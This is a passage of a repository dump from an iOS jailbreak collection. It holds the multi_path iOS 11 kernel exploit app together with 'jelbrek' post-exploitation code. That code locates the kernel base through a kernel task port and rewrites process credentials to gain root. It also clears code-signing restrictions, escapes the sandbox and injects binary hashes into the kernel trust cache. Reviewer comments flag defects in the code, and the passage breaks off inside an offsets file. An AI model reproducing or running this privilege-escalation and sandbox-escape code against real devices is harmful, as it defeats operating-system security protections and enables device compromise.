112 | If it worked, you can use the functions in kmem.h to read and write kernel memory 113 | 114 | ***Notes***: 115 | Multiple people have publicly bindiff'ed this bug from the patch (or their 0day got patched ;) — read their stuff for more details: 116 | @elvanderb gave a lightning talk about the bug at rump.beer in Paris on May 31st: https://www.rump.beer/2018/slides/ios_48h.pdf 117 | @jaakerblom published a working exploit on github on June 1st: https://github.com/potmdehex/multipath_kfree 118 | John's technique is similar to mine but he does a two-byte overflow rather than a three byte one, and replaces with different objects. good stuff! 119 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate 
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | multi_path.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | multi_path.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // multi_path 4 | // 5 | // Created by Ian Beer on 5/28/18. 6 | // Copyright © 2018 Ian Beer. All rights reserved. 
7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // multi_path 4 | // 5 | // Created by Ian Beer on 5/28/18. 6 | // Copyright © 2018 Ian Beer. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 
33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" 
: "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | } 88 | ], 89 | "info" : { 90 | "version" : 1, 91 | "author" : "xcode" 92 | } 93 | } -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 
LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // multi_path 4 | // 5 | // Created by Ian Beer on 5/28/18. 6 | // Copyright © 2018 Ian Beer. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // multi_path 4 | // 5 | // Created by Ian Beer on 5/28/18. 6 | // Copyright © 2018 Ian Beer. All rights reserved. 
//

// NOTE(review): the three system header names on the bare `#include` lines
// below were lost in extraction; restore them from the original file before
// building.
#import "ViewController.h"
#include "sploit.h"
#include "jelbrek/jelbrek.h"
#include
#include
#include

// Task port returned by go() (declared in sploit.h). Written by -go: and read
// by find_kernel_base(); a plain process-wide global with no synchronisation.
mach_port_t taskforpidzero;

/// Finds the kernel Mach-O header by probing the kernel address range with
/// vm_read() on `taskforpidzero`.
///
/// Starting at KERNEL_SEARCH_ADDRESS_IOS10 + MAX_KASLR_SLIDE and stepping
/// down 0x200000 per iteration, 0x200 bytes are read at each candidate and
/// the first 32 bits are compared against MACHO_HEADER_MAGIC. On a match the
/// candidate is re-read (0x1000 bytes) and the first 0x2000 bytes are walked
/// at pointer stride, reading 0x120 bytes at each step, until a record whose
/// name is "__text" and whose name at +0x10 is "__PRELINK_TEXT" is seen
/// (presumably the section_64 entry for __PRELINK_TEXT,__text -- confirm
/// against the Mach-O layout). That candidate is printed together with its
/// distance from 0xfffffff007004000 and returned.
///
/// @return The address that passed both checks. There is no failure return.
///
/// NOTE(review), defects visible in this function:
///  - vm_read() allocates every result buffer in this task's address space;
///    nothing calls vm_deallocate(), so memory is leaked on each outer
///    iteration and again on every inner-loop read.
///  - The loop has no lower bound: if no header is found, `addr` (unsigned)
///    keeps decrementing and wraps.
///  - The inner loop spans 0x2000 bytes although only 0x1000 were re-read,
///    and strcmp() assumes a terminating NUL inside the 0x120-byte read.
///  - A failed vm_read() in the inner loop calls exit(-1), terminating the
///    whole app instead of reporting failure to the caller.
///  - 0xfffffff007004000 is repeated as a literal although
///    KERNEL_SEARCH_ADDRESS_IOS10 names the same value; IMAGE_OFFSET and the
///    IOS9/IOS search addresses are defined but unused.
///  - The two inner `int ret` (and the inner `sz`) shadow the outer ones.
uint64_t find_kernel_base() {
#define IMAGE_OFFSET 0x2000
#define MACHO_HEADER_MAGIC 0xfeedfacf
#define MAX_KASLR_SLIDE 0x21000000
#define KERNEL_SEARCH_ADDRESS_IOS10 0xfffffff007004000
#define KERNEL_SEARCH_ADDRESS_IOS9 0xffffff8004004000
#define KERNEL_SEARCH_ADDRESS_IOS 0xffffff8000000000

#define ptrSize sizeof(uintptr_t)

    uint64_t addr = KERNEL_SEARCH_ADDRESS_IOS10+MAX_KASLR_SLIDE;


    while (1) {
        char *buf;
        mach_msg_type_number_t sz = 0;
        kern_return_t ret = vm_read(taskforpidzero, addr, 0x200, (vm_offset_t*)&buf, &sz);

        if (ret) {
            goto next;  // unreadable candidate: step down and retry
        }

        if (*((uint32_t *)buf) == MACHO_HEADER_MAGIC) {
            int ret = vm_read(taskforpidzero, addr, 0x1000, (vm_offset_t*)&buf, &sz);
            if (ret != KERN_SUCCESS) {
                printf("Failed vm_read %i\n", ret);
                goto next;
            }

            // Walk the header at pointer stride looking for the section record.
            for (uintptr_t i=addr; i < (addr+0x2000); i+=(ptrSize)) {
                mach_msg_type_number_t sz;
                int ret = vm_read(taskforpidzero, i, 0x120, (vm_offset_t*)&buf, &sz);

                if (ret != KERN_SUCCESS) {
                    printf("Failed vm_read %i\n", ret);
                    exit(-1);  // NOTE(review): kills the app; no error return exists
                }
                if (!strcmp(buf, "__text") && !strcmp(buf+0x10, "__PRELINK_TEXT")) {

                    printf("kernel base: 0x%llx\nkaslr slide: 0x%llx\n", addr, addr - 0xfffffff007004000);

                    return addr;
                }
            }
        }

    next:
        addr -= 0x200000;
    }
}

@interface ViewController ()

@end

@implementation ViewController

/// Applies the three process patches declared in jelbrek.h to this process
/// (get_root, empower, unsandbox, each on getpid()) and reports the outcome
/// with alerts. The BOOL results of get_root/unsandbox are ignored; success is
/// judged solely by geteuid() == 0 afterwards. The "OK" handler of the success
/// alert probes the sandbox by opening /var/mobile/.roottest for writing and
/// shows whether that worked.
///
/// NOTE(review): `fclose(f)` after the if/else runs even when fopen() returned
/// NULL (the `f == 0` branch), which is undefined behaviour -- it belongs in
/// the else branch. The probe file is never removed afterwards.
-(void)jelbrek {
    get_root(getpid());
    empower(getpid());
    unsandbox(getpid());


    if (geteuid() == 0) {
        UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"root" message:@"Success! Got root!" preferredStyle:UIAlertControllerStyleAlert];

        UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {
            FILE *f = fopen("/var/mobile/.roottest", "w");
            if (f == 0) {
                UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"sandbox" message:@"Failed to escape sandbox!" preferredStyle:UIAlertControllerStyleAlert];

                UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];

                [alert addAction:defaultAction];

                [self presentViewController:alert animated:YES completion:nil];
            } else {
                UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"sandbox" message:[NSString stringWithFormat:@"Successfully wrote file! %p", f] preferredStyle:UIAlertControllerStyleAlert];

                UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];

                [alert addAction:defaultAction];

                [self presentViewController:alert animated:YES completion:nil];
            }
            fclose(f);  // NOTE(review): also reached when f == NULL
        }];

        [alert addAction:defaultAction];

        [self presentViewController:alert animated:YES completion:nil];


    }
    else {
        UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"root" message:@"Failed to get root!" preferredStyle:UIAlertControllerStyleAlert];

        UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];

        [alert addAction:defaultAction];

        [self presentViewController:alert animated:YES completion:nil];
    }
    // Disabled follow-up left by the author (trust + spawn a bundled binary).
    //NSString *testbin = [NSString stringWithFormat:@"%@/test", [[NSBundle mainBundle] bundlePath]];
    //chmod([testbin UTF8String], 777);
    //trust_bin([testbin UTF8String]);

    //pid_t pd;

    //const char* args[] = {[testbin UTF8String], "101010", NULL};
    //int rv = posix_spawn(&pd, [testbin UTF8String], NULL, NULL, (char **)&args, NULL);

}
/// Button action. Runs go() (sploit.h) and stores the returned port in the
/// global `taskforpidzero`; on a non-null port it initialises jelbrek with
/// the located kernel base and patches this process, otherwise it shows a
/// failure alert.
/// NOTE(review): find_kernel_base() has no failure return, so this branch
/// either gets a base or never comes back (see its doc comment).
- (IBAction)go:(id)sender {
    taskforpidzero = go();

    if (taskforpidzero != MACH_PORT_NULL) {
        init_jelbrek(taskforpidzero, find_kernel_base());
        [self jelbrek];
    }
    else {
        UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"tfp0" message:@"Exploit failed!" preferredStyle:UIAlertControllerStyleAlert];

        UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];

        [alert addAction:defaultAction];

        [self presentViewController:alert animated:YES completion:nil];
    }
}

/// Xcode template override; nothing project-specific happens here.
- (void)viewDidLoad {
    [super viewDidLoad];
    // Do any additional setup after loading the view, typically from a nib.
}


/// Xcode template override; nothing project-specific happens here.
- (void)didReceiveMemoryWarning {
    [super didReceiveMemoryWarning];
    // Dispose of any resources that can be recreated.
}


@end
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/jelbrek.h: --------------------------------------------------------------------------------

// Post-exploitation helpers layered on kern_utils (kernel r/w through tfp0).
// NOTE(review): no include guard; mach_port_t, kern_return_t, BOOL and pid_t
// are used without an include, so the includer must bring them in first.

/// Initialises kern_utils with `tfp0` and patchfinder64 with `kernel_base`.
void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
/// Links the code hashes grab_hashes() collects under `path` into the kernel
/// trust chain. Returns grab_hashes()'s result; 0 is treated as success.
kern_return_t trust_bin(const char *path);
/// Zeroes one field reached through `pid`'s ucred; YES if the read-back is 0.
BOOL unsandbox(pid_t pid);
/// Rewrites `pid`'s p_csflags (exact bits documented in jelbrek.m).
void empower(pid_t pid);
/// Zeroes `pid`'s proc and ucred uid/gid fields; YES if geteuid() is then 0.
BOOL get_root(pid_t pid);
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/jelbrek.m: --------------------------------------------------------------------------------
// NOTE(review): the first two system header names (and the commented-out
// third) were lost in extraction; the page shows them bare.
#import
#include
#include "kern_utils.h"
#include "patchfinder64.h"
#include "libjb.h"
#include "offsetof.h"
#include "jelbrek.h"
//#include "inject_criticald.h"
//#include "unlocknvram.h"
//#include


/// Sets up the two dependencies every other function here relies on: the
/// kernel r/w primitives (kern_utils) with the task port, and patchfinder64
/// with the kernel base. The second argument to init_kernel() is passed as
/// NULL; its meaning is defined in patchfinder64, not visible here.
void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base) {
    init_kernel_utils(tfp0);
    init_kernel(kernel_base, NULL);
}

/// Prepends a trust_mem record holding the hashes grab_hashes() collected
/// for `path` to the kernel trust chain.
///
/// Visible steps: read the current chain head into mem.next, fill the uuid
/// with a fixed marker, collect hashes, kalloc() a 64 KiB-rounded region,
/// write the header followed by numhash * 20 bytes of hashes, then point the
/// chain head at the new region and free the host-side tables.
///
/// @param path  Root handed to grab_hashes().
/// @return grab_hashes()'s result (`rv`); 0 is reported as success.
///
/// NOTE(review):
///  - `rv` is only inspected after the kernel writes; when grab_hashes()
///    fails the kalloc()/kwrite()/chain update still run with whatever
///    numhash and allhash hold at that point.
///  - kalloc()'s result is not checked for 0 before writing through it.
///  - allhash/allkern/amfitab (globals from libjb.h) are free()d but not
///    reset; libjb.h says grab_hashes() may be called repeatedly, so confirm
///    it reallocates rather than reusing the freed pointers.
///  - numhash is `unsigned` but printed with %d, and the error printf has no
///    trailing newline. The function is declared kern_return_t but returns
///    grab_hashes()'s plain int.
kern_return_t trust_bin(const char *path) {
    uint64_t trust_chain = find_trustcache();
    uint64_t amficache = find_amficache();

    printf("[*] trust_chain at 0x%llx\n", trust_chain);
    printf("[*] amficache at 0x%llx\n", amficache);

    struct trust_mem mem;
    mem.next = kread64(trust_chain);
    *(uint64_t *)&mem.uuid[0] = 0xabadbabeabadbabe;
    *(uint64_t *)&mem.uuid[8] = 0xabadbabeabadbabe;

    int rv = grab_hashes(path, kread, amficache, mem.next);

    // Round header + hashes up to a 64 KiB multiple before allocating.
    size_t length = (sizeof(mem) + numhash * 20 + 0xFFFF) & ~0xFFFF;
    uint64_t kernel_trust = kalloc(length);
    printf("[*] alloced: 0x%zx => 0x%llx\n", length, kernel_trust);

    mem.count = numhash;
    kwrite(kernel_trust, &mem, sizeof(mem));
    kwrite(kernel_trust + sizeof(mem), allhash, numhash * 20);
    kwrite64(trust_chain, kernel_trust);

    free(allhash);
    free(allkern);
    free(amfitab);

    if (rv == 0)
        printf("[*] Successfully trusted binaries? return value=%d numhash=%d\n", rv, numhash);
    else
        printf("[*] Unknown error while trusting binaries! return value=%d numhash=%d", rv, numhash);
    return rv;
}


/// Zeroes one pointer-sized field reached via `pid`'s ucred and reports
/// whether the read-back is 0.
/// NOTE(review): 0x78 and the +8+8 displacement are bare literals rather than
/// offsetof.h entries like every other offset in this file; presumably the
/// ucred label pointer and a slot inside it -- confirm against the kernel
/// build the offsets target, since a stale value writes to unrelated memory.
BOOL unsandbox(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    uint64_t ucred = kread64(proc + offsetof_p_ucred);
    kwrite64(kread64(ucred + 0x78) + 8 + 8, 0x0);

    return (kread64(kread64(ucred + 0x78) + 8 + 8) == 0) ? YES : NO;
}

/// Rewrites `pid`'s p_csflags: sets CS_PLATFORM_BINARY, CS_INSTALLER,
/// CS_GET_TASK_ALLOW and CS_DEBUGGED and clears CS_RESTRICT, CS_HARD and
/// CS_KILL (bit values in offsetof.h). No return value and no read-back.
void empower(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    uint32_t csflags = kread32(proc + offsetof_p_csflags);
    csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
    kwrite32(proc + offsetof_p_csflags, csflags);
}

/// Writes 0 to p_uid/p_ruid/p_gid/p_rgid on the proc and to cr_uid, cr_ruid,
/// cr_svuid, cr_groups, cr_rgid and cr_svgid on its ucred, sets cr_ngroups to
/// 1, then reports whether geteuid() now returns 0.
/// @param pid  Process to patch. NOTE(review): the return value tests the
///             *calling* process's euid, so it is only meaningful when `pid`
///             is getpid().
BOOL get_root(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    uint64_t ucred = kread64(proc + offsetof_p_ucred);
    kwrite32(proc + offsetof_p_uid, 0);
    kwrite32(proc + offsetof_p_ruid, 0);
    kwrite32(proc + offsetof_p_gid, 0);
    kwrite32(proc + offsetof_p_rgid, 0);
    kwrite32(ucred + offsetof_ucred_cr_uid, 0);
    kwrite32(ucred + offsetof_ucred_cr_ruid, 0);
    kwrite32(ucred + offsetof_ucred_cr_svuid, 0);
    kwrite32(ucred + offsetof_ucred_cr_ngroups, 1);
    kwrite32(ucred + offsetof_ucred_cr_groups, 0);
    kwrite32(ucred + offsetof_ucred_cr_rgid, 0);
    kwrite32(ucred + offsetof_ucred_cr_svgid, 0);

    return (geteuid() == 0) ? YES : NO;
}

// Commented-out sketch left by the author; it references helpers and offsets
// (getVnodeAtPath, off_v_specflags, ...) that are not declared anywhere in
// this project. The nested /* */ pairs below are reproduced as found.
/*void remount(){

    char *devpath = strdup("/dev/disk0s1s1");
    uint64_t devVnode = getVnodeAtPath(devpath);
    kwrite64(devVnode + off_v_specflags, 0); // clear dev vnode’s v_specflags

    /* 1. make a new mount of the device of root partition */

    /*char *newMPPath = strdup("/private/var/mobile/tmp");
    createDirAtPath(newMPPath);
    mountDevAtPathAsRW(devPath, newMPPath);


    /* 2. Get mnt_data from the new mount */

    /*uint64_t newMPVnode = getVnodeAtPath(newMPPath);
    uint64_t newMPMount = kread64(newMPVnode + off_v_mount);
    uint64_t newMPMountData = kread64(newMPMount + off_mnt_data);



    /* 3. Modify root mount’s flag and remount */

    /*uint64_t rootVnode = getVnodeAtPath("/");
    uint64_t rootMount = kread64(rootVnode + off_v_mount);
    uint32_t rootMountFlag = kread64(rootMount + off_mnt_flag);
    kwrite64(rootMount + off_mnt_flag, rootMountFlag & ~ ( MNT_NOSUID | MNT_RDONLY | MNT_ROOTFS));

    mount("apfs", "/", MNT_UPDATE, &devpath);

    /* 4. Replace root mount’s mnt_data with new mount’s mnt_data */

    /*kwrite64(rootMount + off_mnt_data, newMPMountData);

}*/
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/kern_utils.h: --------------------------------------------------------------------------------
//
//  fun_utils.h
//  async_wake_ios
//
//  Created by George on 18/12/17.
//  Copyright © 2017 Ian Beer. All rights reserved.
//
// NOTE(review): this file is kern_utils.h in the multi_path project but the
// header comment and include guard still say fun_utils / async_wake_ios,
// from which it was evidently carried over.

#ifndef fun_utils_h
#define fun_utils_h

// NOTE(review): the nine system header names on the bare `#include` lines
// below were lost in extraction; restore them from the original file.
#include
#include
#include
#include
#include
#include
#include
#include
#include


// Needed definitions
// mach_vm_* prototypes written out by hand, presumably because the iOS SDK
// does not ship <mach/mach_vm.h>; they must match the libsystem exports.
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);

// "General" purpose
// Host-side helpers; implementations are not in this chunk, so their
// ownership and error conventions cannot be stated here.
uint8_t *get_sha256(uint8_t* code_dir);
uint8_t *get_code_directory(const char* name);
int cp(const char *from, const char *to);
int file_exist(char *filename);

// Kernel utility stuff
// Kernel read/write primitives over the task port handed to
// init_kernel_utils(); init_jelbrek() in jelbrek.m calls that first.
// kread/kwrite return the byte count; the 32/64-bit variants return or take
// the value directly and expose no error signal.
void init_kernel_utils(mach_port_t tfp0);
uint64_t kalloc(vm_size_t size);
size_t kread(uint64_t where, void *p, size_t size);
uint32_t kread32(uint64_t where);
uint64_t kread64(uint64_t where);
size_t kwrite(uint64_t where, const void *p, size_t size);
void kwrite32(uint64_t where, uint32_t what);
void kwrite64(uint64_t where, uint64_t what);
uint64_t proc_for_pid(pid_t pid);
uint64_t proc_for_name(char *nm);
uint64_t find_port_address(mach_port_name_t port);
uint64_t task_self_addr();  // NOTE(review): unprototyped; should be (void)
uint64_t kmem_alloc_wired(uint64_t size);
#endif /* fun_utils_h */
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/libjb.h: --------------------------------------------------------------------------------
/* NOTE(review): the system header name on the next line was lost in
 * extraction. */
#include

#ifndef libjb_h_included
#define libjb_h_included



/* libhfs *******************************************************************/

/* Permission and file-type bits packed into the `flags` value returned by
 * HFSGetDirEntry(); kPermMask / kFileTypeMask select the two groups. */
enum {
    kPermOtherExecute = 1 << 0,
    kPermOtherWrite = 1 << 1,
    kPermOtherRead = 1 << 2,
    kPermGroupExecute = 1 << 3,
    kPermGroupWrite = 1 << 4,
    kPermGroupRead = 1 << 5,
    kPermOwnerExecute = 1 << 6,
    kPermOwnerWrite = 1 << 7,
    kPermOwnerRead = 1 << 8,
    kPermMask = 0x1FF,
    kOwnerNotRoot = 1 << 9,
    kFileTypeUnknown = 0x0 << 16,
    kFileTypeFlat = 0x1 << 16,
    kFileTypeDirectory = 0x2 << 16,
    kFileTypeLink = 0x3 << 16,
    kFileTypeMask = 0x3 << 16
};

typedef long CICell;  /* opaque handle returned by HFSOpen() */

extern char *gLoadAddr; /* buffer of size 32MB (max file size) */

/* Minimal HFS reader; the handle from HFSOpen() is passed to the others and
 * released by HFSClose(). */
CICell HFSOpen(const char *filename, long offset);
long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
void HFSClose(CICell);

/* untar ********************************************************************/

/* untar 'a' to current directory.
kernel read func & amfi/top trust chain block are optional */
/* Collects code hashes under `root` into the allhash/numhash globals above.
 * trust_bin() in jelbrek.m passes kread from kern_utils.h, the amficache
 * address and the current trust-chain head, and treats a 0 result as
 * success. NOTE(review): trust_bin() free()s allhash/allkern/amfitab after
 * use without resetting them; confirm this function reallocates on re-entry. */
int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);

#endif
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/offsetof.c: --------------------------------------------------------------------------------
// Hard-coded kernel structure offsets for the kernel builds this project
// targets. They are plain globals (so a caller could patch them at runtime)
// but nothing here validates them against the running kernel: a mismatch
// means every kread*/kwrite* in jelbrek.m touches the wrong field.
// NOTE(review): offsetof.h declares offsetof_ucred_cr_gid, which has no
// definition in this file (a link error for anything that references it).
unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
unsigned offsetof_task = 0x18; // proc_t::task
unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
